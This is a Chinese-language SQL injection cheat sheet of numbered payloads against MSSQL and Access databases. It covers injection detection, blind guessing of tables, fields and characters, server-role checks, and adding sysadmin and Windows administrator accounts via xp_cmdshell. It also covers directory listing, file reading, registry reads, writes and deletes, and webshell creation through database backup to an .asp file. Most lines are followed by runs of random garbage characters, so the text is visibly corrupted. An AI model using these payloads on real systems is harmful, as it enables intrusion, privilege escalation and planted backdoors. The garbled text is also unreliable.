1.判断是否有注入;and 1=1 ;and 1=2 |PN-,f{�-�
2.初步判断是否是mssql ;and user>0 y_"G��Mw��
2W
pe(
�\(
3.注入参数是字符'and [查询条件] and ''=' ��EpGe'�S
[[D}�vL8d�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �P�'s���<M
T
G�MHo{�]
5.判断数据库系统 8�9�l_%To�
}jU{�RR%6B
;and (select count(*) from sysobjects)>0 mssql ��&�3{:h��
:kZ2N��6�7
;and (select count(*) from msysobjects)>0 access p!'�wOThO`
�z@y�*
jT�
$#4�z�>~0
"�E��pE!jh
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �17D1�67\X
�}sy3M��rb
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 LW���bWj ^
MC#bo{Bq3-
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 |i�M*}I�x-
?�vRz}�hiy
9.(1)猜字段的ascii值(access) �Z-4��A`@p
j~DoMP5Ls�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �p�q5�)U�g
e;3$7$n Pv
(2)猜字段的ascii值(mssql) Lu:!v�TRmw
��q\��#3�G
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �@7lZ�{jV$
jZv8X��5�i
10.测试权限结构(mssql) s�*�k"�-5�
\g�4\�a�?i
k9 �*0xukJ
�|��r�-�<t
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =X&�h5;�x'
V2/+Sv��B2
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 6lT'%�ho}B
FA{I
��S0
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- uy\Y�J.WMQ
[9?=��&O#*
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {O�Ay�@6
+
�f|� �N(�~
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }T��c)�M_
�`"ie��57-
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- A94VSUDA:�
��.�h+<m7�
;and 1=(select IS_MEMBER('db_owner'));-- Y��SrFHVq�
ObM5v�rEk|
Fe�V=�4tsy
U�jKHGsDi4
11.添加mssql和系统的帐户 D�'nV
&��m
Xkv>@7ec
;exec master.dbo.sp_addlogin username;-- #gN{�8Y�k>
;exec master.dbo.sp_password null,username,password;-- �]V�wky�]d
�G|O�"K�v6
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- W>@%d`>o5�
��KktTR�`W
;exec master.dbo.xp_cmdshell 'net user username password RM�<\b�ZPc
M�2x�U�s��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 3al5Vu2:��
�j|aT`UH03
;exec master.dbo.xp_cmdshell 'net user username password /add';-- E"G.�_<3J8
?�tA-��`\E
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- G~�esSL^G/
r��kD4}j�V
<�K\F/`�c
xBw"�RCBz^
12.(1)遍历目录 ��*M�p�<4B
U'�lmQrF!
;create table dirs(paths varchar(100), id int) B!t�t�e�)
p>}N9v;�Bo
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��]�ip��VN
O�_iX�1@SW
;and (select top 1 paths from dirs)>0
Osy5�|Ts
r*p�%�e\ 3
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) NX=dx&i�>+
��.`h+�fqa
O3BU.X1'%�
l%w�7��N9�
(2)遍历目录 z:�fhq:R(�
U_�8I$�v-~
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- d�?{�2A84S
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 '\_)�\`a|�
fgl�Zj�T��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��}E�1Eq��
50�R+D0^mh
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 e5X�ik�L�u
[�&`>&u@MK
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =:0(�&NCRq
11-uJV�O~*
�sNZ�Pv^c
�pF���!vW�
13.mssql中的存储过程 h�=��U 4�
�+�_}2�zc4
xp_regenumvalues 注册表根键, 子键 cXCczqab�v
v�*�^2[p�f
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �=&� lY�v�
,�pG63&?j�
xp_regread 根键,子键,键值名 �'#Fh
J%�x
y�(�z�U:�.
;exec xp_regread dk]ro�~ �[
Lul?@�>T��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 VN"�.N��EL
^�}[
N��4
xp_regwrite 根键,子键, 值名, 值类型, 值 jXDo!a|�4y
�7>��mY�D3
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��d�!X?R}�
C��F��A�>
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �2M1mdk�P3
��ky�%%H;�
xp_regdeletevalue 根键,子键,值名 .R"L$V$RU.
X�5y�h���S
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 N|)V/�no�6
;Dgp
!*�v=
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 #P�@r[VZ{6
��{p\KB!Y-
24T�w1�'mW
18HHE��W�{
14.mssql的backup创建webshell ,5?�M�RqCM
�W!^=�)Qs
use model w#�$k$T)��
�!�58JK f
create table cmd(str image); ~S6N�'$�^
&ivIv�[LV�
insert into cmd(str) values (''); e�C�39C2q\
N{yZk"fq:6
backup database model to disk='c:\l.asp'; qp��rOxP
r
8UcT�?�Z�p
�{ULnQ�6@�
�F�o�=6A[J
15.mssql内置函数 ]r�m=F]W/n
1mV0AE538�
;and (select @@version)>0 获得Windows的版本号 6�;*(6�$;
TExlGAHo+O
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
5~F0'tb|}
!R@�4tSu��
;and (select user_name())>0 爆当前系统的连接用户 �f*~fslY,o
J�)->
7h�=
;and (select db_name())>0 得到当前连接的数据库 A~>�=�l�=�
�y_&XF>k91
~k�(Ez pn#
q�Q'@yT�VN
16.简洁的webshell 'W*F[U*&HP
�rY= #�^�S
use model �[�)�pT{QA
�k}.nH"AQ
create table cmd(str image); ��B=r/(�e�
���`y#C%9#
insert into cmd(str) values (''); Q�a%�SvA@R
4\3�t�5n�
backup database model to disk='g:\wwwtest\l.asp';
